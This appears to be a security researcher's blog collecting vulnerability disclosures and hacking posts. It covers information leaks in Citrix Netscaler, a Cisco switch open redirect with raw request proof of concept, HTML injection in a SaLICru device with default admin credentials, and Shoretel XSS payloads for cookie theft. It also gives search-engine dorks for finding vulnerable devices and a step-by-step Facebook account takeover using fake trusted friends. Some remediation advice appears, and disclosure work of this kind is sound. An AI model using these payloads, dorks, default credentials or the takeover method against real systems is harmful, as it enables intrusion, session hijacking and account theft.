Citrix Netscaler Gateway Information Disclosure Vulnerabilities

# Exploit Title: Citrix Netscaler Gateway Information Disclosure Vulnerabilities.
# Google Dork: intitle:"netscaler gateway" intext:password "please log on"
# Discovered Date: 07/03/2014
# Exploit Author: Ramikan
# Website: http://fact-in-hack.blogspot.com
# Vendor Homepage:https://www.citrix.com/products/citrix-gateway/
# Affected Devices: citrix-gateway  
# Tested On: citrix-gateway 11.1.53.11, 12.0.61.8
# Version: 11.X through 12.0.X may be affected on other versions too.
# CVE :
# Category:Hardware, Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/
*************************************************************************************************************************************

Vulnerability : Information Gathering

Access the below link directly, which will disclose the version number and also the file path location.

https://<ip address>/vpn/pluginlist.xml

*************************************************************************************************************************************
Output:
*************************************************************************************************************************************

<?xml version="1.0" encoding="ISO-8859-1"?>
<repositories>
<repository name="default">
<plugin type="WIN-EPA" path="/epa/scripts/win/nsepa_setup.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="WIN-EPA64" path="/epa/scripts/win/nsepa_setup64.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="WIN-VPN" path="/vpns/scripts/vista/AGEE_setup.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="MAC-EPA" path="/epa/scripts/mac/Citrix_Endpoint_Analysis.dmg" name="" compatibleTill="" compatibleFrom="3.1.2.0" version="3.1.2.0"/>
<plugin type="MAC-VPN" path="/vpns/scripts/mac/Citrix_Access_Gateway.dmg" name="" compatibleTill="" compatibleFrom="4.4.0 (510)" version="4.4.0 (510)"/>
<plugin type="WIN-EPA-ENGINE" path="/epa/scripts/win/epaPackage.exe" name="EPA scanning Engine (Opswat) for Windows" version="1.1.2.6" opswatVersion="4.3.344.0"/>
<plugin type="MAC-EPA-ENGINE" path="/epa/scripts/mac/MacLibs.zip" name="EPA scanning Engine (Opswat) for Mac" version="1.2.6.3" opswatVersion="4.3.244.0"/>
</repository>
</repositories>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Alternateviely, you can follow the below steps.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1. Open in browser:
https://<IP address>/epa/scripts/win/nsepa_setup.exe

2. Save the file "nsepa_setup.exe" and extract it with archiver (7-zip).

3. From newly extracted files extract again the "nsepa.msi" file.

4. From newly extracted files extract again the "nsepa.cab" file.

5. Select "Properties" on the extracted "nsepa.exe" file.

6. Select "Details" tab where the version is visible.

Cisco Small Business 200, 300, 500 Switches Multiple Vulnerabilities- CVE-2019-1943

# Exploit Title: Cisco Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website: https://github.com/Ramikan.
# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
# Affected Devices:  The affected products are “all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled,”
# Tested On: Cisco C300 Switch
# Version: 1.3.7.18
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category:Hardware, Web Apps
# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect

*************************************************************************************************************************************

Vulnerability 1: Information Gathering

*************************************************************************************************************************************

Unauthenticated user can find the version number and device type by visiting this link directly.

Affected URL:

/cs703dae2c/device/English/dictionaryLogin.xml

*************************************************************************************************************************************

Vulnerability 2: Open Redirect due to host header.

*************************************************************************************************************************************

Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.

Normal Request

GET / HTTP/1.1
Host: 10.1.1.120
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0

Normal Response

HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://10.21.151.120/cs703dae2c/

<html><head></head><body>
                        This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
                        Please update your documents to reflect the new location.
                        </body></html>
*************************************************************************************************************************************
POC
*************************************************************************************************************************************

Host Header changed to different domain (example google.com).

Request:

GET /cs703dae2c HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://google.com/cs703dae2c/config/log_off_page.htm

<html><head></head><body>
                        This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
                        Please update your documents to reflect the new location.
                        </body></html>


The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.

*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "domainname of the cisco device"


*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************

Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.

Issue 2:
The developers won’t be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.

We have assigned CVE CVE-2019-1943 for this issue.

Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect

*************************************************************************************************************************************

CVE-2019-10887- SaLICru -SLC-20-cube3(5) - HTML Injection

# Exploit Title: Reflected HTML Injection
# Google Dork: None
# Date: 16/12/2015
# Exploit Author: Ramikan
# Vendor Homepage:https://www.salicru.com/en/
# Software Link: N/A
# Version: Tested on SaLICru -SLC-20-cube3(5).
# Firmware: cs121-SNMP v4.54.82.130611
# CVE : CVE-2019-10887
# Category:Web Apps


Vulnerability: Reflected HTML Injection
Vendor Web site:
Version tested:cs121-SNMP v4.54.82.130611
Solution: N/A
Note:Default credential:admin/admin or admin/cs121-snmp
Victim need to be authenticated in order to get affected by this.


Vulnerability 1:Refelected HTML Injection

Affected URL:

/DataLog.csv?log=
/AlarmLog.csv?log=
/waitlog.cgi?name=
/chart.shtml?data=
/createlog.cgi?name=

Affected Parameter: log, name, data

Payload:
<h1>HTML Injection</h1>

Shoretel Connect Multiple Vulnerability (CVE-2019-9591, CVE-2019-9592, CVE-2019-9593)

# Exploit Title: Shoretel Connect Multiple Vulnerability
# Google Dork: inurl:/signin.php?ret=
# Date: 14/06/2017
# Author: Ramikan
# Vendor Homepage: https://www.shoretel.com/
# Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
# Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions.
# Tested on: Mozila Firefox 53.0.3 (32 bit) Browser
# CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593
# Category:Web Apps


Vulnerability: Reflected XSS and Session Fixation
Vendor Web site: http://support.shoretel.com
Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0
Google dork: inurl:/signin.php?ret=
Solution: Update to 19.49.1500.0



Vulnerability 1:Refelected XSS & Form Action Hijacking

Affected URL:

/signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT

Affected Parameter: brandUrl


Vulnerability 2: Reflected XSS

Affected URL:

/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b

Affected Parameter: url
Affected Version 19.45.1602.0


Vulnerability 3: Reflected XSS

/site/?page=jtqv8"><script>alert(1)</script>bi14e

Affected Parameter: page
Affected Version:18.82.2000.0

GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1
Host: hostnamem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bdrsconference.bdrs.com/signin.php
Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Vulnerability 4: Session Hijacking

By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session.

PHPSESSID, chkcookie both cookies are insecure.

How to Hack Locked Windows Laptop

Description:

Windows 8, windows 10, Windows 2012 servers comes with a default user logon screen and one of the feature in the logon screen is, the network selection user interface. This feature allows users to connect to the wireless network, turn on and off the network card etc without having to unlock the windows screen.

Risk:

This feature expose security risk, If the adversary has physical access to the machine even for few seconds, the adversary can open this network UI and connect the system to the attackers rouge wireless access point and can later perform MITM attack (as an example) and can potentially compromise the whole system.

 

Affected System:

Devices running Windows 8, windows 10, windows 2012 operating system with wireless card.

Recommendation:

To protect from this risk we need to disable this network UI on the log on screen and this can be achieved by doing it in the group policy or in the registry by going to

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System

and add DontDisplayNetworkSelectionUI=dword:00000001

Can I Hack Your Facebook ?

Facebook had a fantastic option for retrieving the account in a situation if you had  forgotten both your password & username and also if you don't have access to your registered email account.

All you need is a 3 good friends who is in your friends list. Yes, same old friends are back in frame for getting back your account, after all these years the best way Facebook came up to retrieve the account was by sending security codes to your 3 friends. Once you have the codes you can get back to your account.

This should be a great solution for someone who desperately want to get back his account back. This option is also good for hackers who can take over the accounts. How?

Just create 3 fake FB accounts (impersonate)  and get added into the victims trusted friends list, then simply follow the Facebook recovery option and your done, you hacked someones account.





Click "No longer have access to these?"







Enter the email ID that you can access and continue.




Click Continue and now comes the fantastic option. :)



 Select those 3 fake friends that you managed to add to the victims friends list and continue.

Your fake friends will receive security codes, complete the process and then reset the account with new password and now you hacked into the account.

This option was now removed by FB thank god for that, but hey belive me after 5 years they come up again with similar stupid options, so people who just accepts friends request from everyone please keep this in mind, you may have just added a hacker as your friend.....

Next time we will see how to deny any FB user from accessing the Facebook for few hours are even upto few days.... Sounds like fun ?

  Keep safe...